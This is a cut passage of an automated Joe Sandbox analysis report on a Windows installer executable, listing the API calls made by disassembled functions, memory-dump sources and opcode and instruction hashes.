                                                                                                                                                              • Opcode Fuzzy Hash: 6f48d1f4569c46ba79332d618e5f2744522d6a7c4d3c9928c8ba38f6ac20f072
                                                                                                                                                              • Instruction Fuzzy Hash: C1110431204141EBCB307FB55D419BF37B09A52725B284A7FE591B22E3DA3D4943AA2E
                                                                                                                                                              APIs
                                                                                                                                                              • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000002,Call,?,00406293,80000002), ref: 00406024
                                                                                                                                                              • RegCloseKey.KERNELBASE(?,?,00406293,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll), ref: 0040602F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseQueryValue
                                                                                                                                                              • String ID: Call
                                                                                                                                                              • API String ID: 3356406503-1824292864
                                                                                                                                                              • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                                                                                                              • Instruction ID: 43fb42cdfa68b2f9ef01d23c83e90927a4e1ed7766022ad00d18a88e1c3f91d6
                                                                                                                                                              • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                                                                                                              • Instruction Fuzzy Hash: 9F01BC72100209ABCF22CF20CC09FDB3FA9EF45364F00403AF916A2191D238C968CBA4
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004057D9: ShellExecuteExA.SHELL32(?,004045C2,?), ref: 004057E8
                                                                                                                                                                • Part of subcall function 00406575: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406586
                                                                                                                                                                • Part of subcall function 00406575: GetExitCodeProcess.KERNEL32(?,?), ref: 004065A8
                                                                                                                                                              • CloseHandle.KERNELBASE(?,?,?,?,?,?), ref: 00401FC0
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCodeExecuteExitHandleObjectProcessShellSingleWait
                                                                                                                                                              • String ID: @$C:\Users\user\AppData\Roaming\Annegrete
                                                                                                                                                              • API String ID: 165873841-995337095
                                                                                                                                                              • Opcode ID: 8fe8ac0d2442a436f60ad62330c22f2e3493bff77536844ff62a2a8c1b5b9efb
                                                                                                                                                              • Instruction ID: bc254e3ce8a8c048b70bb1f30d39422257204709a1b3baa4fffbd621662872af
                                                                                                                                                              • Opcode Fuzzy Hash: 8fe8ac0d2442a436f60ad62330c22f2e3493bff77536844ff62a2a8c1b5b9efb
                                                                                                                                                              • Instruction Fuzzy Hash: 15113D71E04208DECB41EFB9DA49A8DBBF4AF04304F20013BE115FB2D2DAB88502DB18
                                                                                                                                                              APIs
                                                                                                                                                              • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025BA
                                                                                                                                                              • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 004025CD
                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp,00000000,00000011,00000002), ref: 004025E5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Enum$CloseValue
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 397863658-0
                                                                                                                                                              • Opcode ID: 7b99555fd6f8dae37ea9679ab54f9e8123d87756e6997b06f3b56209368cff92
                                                                                                                                                              • Instruction ID: ee0fd62ac357f9525b55a30647733f0e3798e9bebba0400de635a53faed38b57
                                                                                                                                                              • Opcode Fuzzy Hash: 7b99555fd6f8dae37ea9679ab54f9e8123d87756e6997b06f3b56209368cff92
                                                                                                                                                              • Instruction Fuzzy Hash: 22017C71604204FFE7219F549E99ABF7ABCEF40358F20403EF505A61C0DAB88A459629
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00405C6B: GetFileAttributesA.KERNELBASE(?,?,00405883,?,?,00000000,00405A66,?,?,?,?), ref: 00405C70
                                                                                                                                                                • Part of subcall function 00405C6B: SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405C84
                                                                                                                                                              • RemoveDirectoryA.KERNEL32(?,?,?,00000000,00405A66), ref: 00405892
                                                                                                                                                              • DeleteFileA.KERNELBASE(?,?,?,00000000,00405A66), ref: 0040589A
                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 004058B2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1655745494-0
                                                                                                                                                              • Opcode ID: e1eff927f90318b2be8d8bfa20ab09362dfea904f1db048edee7874e77ba7622
                                                                                                                                                              • Instruction ID: 884317569ffd1a4e0211b174c6b8e844a83fc21844c7f3fd671b4113af4a4527
                                                                                                                                                              • Opcode Fuzzy Hash: e1eff927f90318b2be8d8bfa20ab09362dfea904f1db048edee7874e77ba7622
                                                                                                                                                              • Instruction Fuzzy Hash: 65E0E533109E5056F2107730990C65F299CDF86325F05C93AFD92F10C0C73848268A6E
                                                                                                                                                              APIs
                                                                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                              • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                              • Opcode ID: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                                                                                                                              • Instruction ID: 5c958b1953f7fe6cfac6f5d6f257cc34f78b067395a477e057d2c1298905e336
                                                                                                                                                              • Opcode Fuzzy Hash: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                                                                                                                              • Instruction Fuzzy Hash: F801D1317242209BE7195B79DD08B6A3698E710718F50823AF851F61F1DA78DC129B4D
                                                                                                                                                              APIs
                                                                                                                                                              • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402442
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0040244B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseDeleteValue
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2831762973-0
                                                                                                                                                              • Opcode ID: 07b32314aa9a422e600aa3f6776080c68f979d551996adedd097d7eb0a26439f
                                                                                                                                                              • Instruction ID: 28034f9d49707e31730e5ee4ae5769526bd8744af0d0927f07882998c216e066
                                                                                                                                                              • Opcode Fuzzy Hash: 07b32314aa9a422e600aa3f6776080c68f979d551996adedd097d7eb0a26439f
                                                                                                                                                              • Instruction Fuzzy Hash: E3F09632600121DBE720BFA49B8EAAE72A59B40314F25453FF602B71C1D9F84E4246AE
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000011), ref: 00402647
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll, xrefs: 00402638, 0040265D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: lstrlen
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll
                                                                                                                                                              • API String ID: 1659193697-599987783
                                                                                                                                                              • Opcode ID: 1e5770a434f570ac44a35cc6976c59f86ab3785d6c127f4dc180daee0a8d96a4
                                                                                                                                                              • Instruction ID: 676f6a4c447e09d474f7ca140f5a66ce6b5c2f6845edb5c0388f4882f069ab6f
                                                                                                                                                              • Opcode Fuzzy Hash: 1e5770a434f570ac44a35cc6976c59f86ab3785d6c127f4dc180daee0a8d96a4
                                                                                                                                                              • Instruction Fuzzy Hash: 75F08272A09254AAC710FFB55E4AA9F76A4DF91314B20443FF002B71C2DAFD8552962E
                                                                                                                                                              APIs
                                                                                                                                                              • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A31
                                                                                                                                                              • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A44
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: EnvironmentExpandStringslstrcmp
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1938659011-0
                                                                                                                                                              • Opcode ID: ce4306d2a07f27be9225dd95e0d9a06ea23b17b85f17c9412fffb0a9b71968b5
                                                                                                                                                              • Instruction ID: c1865f8cc46f1228928c2992524d711605dd36016a3aefe194dc66e9efe750da
                                                                                                                                                              • Opcode Fuzzy Hash: ce4306d2a07f27be9225dd95e0d9a06ea23b17b85f17c9412fffb0a9b71968b5
                                                                                                                                                              • Instruction Fuzzy Hash: 24F08231705201DBCB20DF769D04A9BBFA4EF91354B10803BE145F6190D6788502CA68
                                                                                                                                                              APIs
                                                                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 00401EE3
                                                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401EEE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$EnableShow
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1136574915-0
                                                                                                                                                              • Opcode ID: 8b7817ca22b79e9cee4aa1cb1be03623fa11f3862aed9c5f3b00cb70b3c6cfe0
                                                                                                                                                              • Instruction ID: 2686c2d45ba130581374544c13beebfcaf73fd10f5aa92b185336ae358fe78f7
                                                                                                                                                              • Opcode Fuzzy Hash: 8b7817ca22b79e9cee4aa1cb1be03623fa11f3862aed9c5f3b00cb70b3c6cfe0
                                                                                                                                                              • Instruction Fuzzy Hash: 69E09232B04200EFD714EFA5EA8856E7BB0EB40325B20413FF001F20C1DAB848418A69
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                                                                                                                • Part of subcall function 00406492: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                                                                                                                                • Part of subcall function 00406492: wsprintfA.USER32 ref: 004064E2
                                                                                                                                                                • Part of subcall function 00406492: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2547128583-0
                                                                                                                                                              • Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                                                                                                                              • Instruction ID: acae0596759e2787f84b09bdc6f4b17f60683fab7501ae0ee02ebffea3798694
                                                                                                                                                              • Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                                                                                                                              • Instruction Fuzzy Hash: F7E08672A0421177D2105A74BE0893B72A8DE89740302043EF546F2144D7389C71966D
                                                                                                                                                              APIs
                                                                                                                                                              • GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe,80000000,00000003), ref: 00405C94
                                                                                                                                                              • CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405CB6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$AttributesCreate
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 415043291-0
                                                                                                                                                              • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                                                                                                                              • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                                                                                                                                                              • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                                                                                                                              • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                                                                                                                                                              APIs
                                                                                                                                                              • GetFileAttributesA.KERNELBASE(?,?,00405883,?,?,00000000,00405A66,?,?,?,?), ref: 00405C70
                                                                                                                                                              • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405C84
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                              • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                                                                                                              • Instruction ID: e57869254d9b62c000b772120ebafc6e643eb49c03cb969dc299021a919e5f7f
                                                                                                                                                              • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                                                                                                              • Instruction Fuzzy Hash: 67D0C972504521AFD2142728AE0889BBB55DB54271702CB36FDA5A26B1DB304C569A98
                                                                                                                                                              APIs
                                                                                                                                                              • CreateDirectoryA.KERNELBASE(?,00000000,0040333B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405767
                                                                                                                                                              • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405775
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1375471231-0
                                                                                                                                                              • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                                                                                                                              • Instruction ID: 5acf30d11c51c39224c83c09ee2e5989404a14e094893e30e7ab7d3df00569a4
                                                                                                                                                              • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                                                                                                                              • Instruction Fuzzy Hash: 21C04C31244505EFD6105B30AE08F177A90AB50741F1644396186E10B0EA388455E96D
                                                                                                                                                              APIs
                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000), ref: 6F952AF7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2314184359.000000006F951000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F950000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2314019695.000000006F950000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2314334219.000000006F953000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2314455683.000000006F955000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_6f950000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                                              • Opcode ID: 002876f845ee85e171de3231112531a2eac83d5ac21581f9397e923e9bce414f
                                                                                                                                                              • Instruction ID: 371aae56a7d36be1d84189f634d142d7800d3bb0b05dea5d4a794beb0e35f240
                                                                                                                                                              • Opcode Fuzzy Hash: 002876f845ee85e171de3231112531a2eac83d5ac21581f9397e923e9bce414f
                                                                                                                                                              • Instruction Fuzzy Hash: 3D412C72508704DFEF60DFA8D9A0B593778FB56328F204426E504D62C1D734E5B58FA1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
